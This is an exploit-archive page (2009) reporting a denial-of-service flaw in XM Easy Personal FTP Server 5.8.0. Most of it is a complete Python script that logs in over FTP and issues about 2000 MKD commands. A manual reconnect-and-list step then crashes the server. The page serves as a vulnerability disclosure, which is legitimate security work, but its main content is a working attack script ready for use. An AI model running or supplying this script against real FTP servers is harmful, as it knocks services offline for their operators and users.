Home / exploits xmepftp580-dos.txt
Posted on 24 November 2009
################### Date of Discovery: 24-Nov-2009 Credits:leinakesi[at]gmail.com Vendor: Dxmsoft ******************************************************************************* Affected: XM Easy Personal FTP Server 5.8.0 Earlier versions may also be affected ******************************************************************************* Overview: XM Easy Personal FTP Server failed to handle more than 2000 files or folders in the root directory. ******************************************************************************* Details: if you could log on the server, take the following steps and the server will crash which lead to DoS. 1.upload 2000 files or folders. 2.close the current connection. 3.use a ftp client to reconnect the server. user ... pass ... port ... list ... crash!!!!!! ******************************************************************************* Exploit example: 1.upload 2000 folders. #!/usr/bin/python import socket import sys def Usage(): print ("Usage: ./expl.py <serv_ip> <Username> <password> ") print ("Example:./expl.py 192.168.48.183 anonymous anonymous ") if len(sys.argv) <> 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] passwd=sys.argv[3] test_string='a' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("Connection error!") sys.exit(1) r=sock.recv(1024) sock.send("user %s " %username) r=sock.recv(1024) sock.send("pass %s " %passwd) for i in range(1,200): sock.send("mkd " + "a" * i +" ") print "[-] " + ("mkd " + "a" * i +" ") r=sock.recv(1024) print "[+] " + r + " " for i in range(1,200): sock.send("mkd " + "b" * i +" ") print "[-] " + ("mkd " + "b" * i +" ") r=sock.recv(1024) print "[+] " + r + " " for i in range(1,200): sock.send("mkd " + "c" * i +" ") print "[-] " + ("mkd " + "c" * i +" ") r=sock.recv(1024) print "[+] " + r + " " for i in range(1,200): sock.send("mkd " + "d" * i +" ") print "[-] " + ("mkd " + "d" * i +" ") r=sock.recv(1024) print "[+] " + r + " " for i in range(1,200): sock.send("mkd " + "e" * i +" ") print "[-] " + ("mkd " + "e" * i +" ") r=sock.recv(1024) print "[+] " + r + " " for i in range(1,200): sock.send("mkd " + "f" * i +" ") print "[-] " + ("mkd " + "f" * i +" ") r=sock.recv(1024) print "[+] " + r + " " for i in range(1,200): sock.send("mkd " + "g" * i +" ") print "[-] " + ("mkd " + "g" * i +" ") r=sock.recv(1024) print "[+] " + r + " " for i in range(1,200): sock.send("mkd " + "h" * i +" ") print "[-] " + ("mkd " + "h" * i +" ") r=sock.recv(1024) print "[+] " + r + " " for i in range(1,200): sock.send("mkd " + "i" * i +" ") print "[-] " + ("mkd " + "i" * i +" ") r=sock.recv(1024) print "[+] " + r + " " for i in range(1,200): sock.send("mkd " + "j" * i +" ") print "[-] " + ("mkd " + "j" * i +" ") r=sock.recv(1024) print "[+] " + r + " " sock.close() sys.exit(0); 2.use a ftp client to reconnect the server for example: start->run->cmd->ftp 127.0.0.1->*****->*****->dir
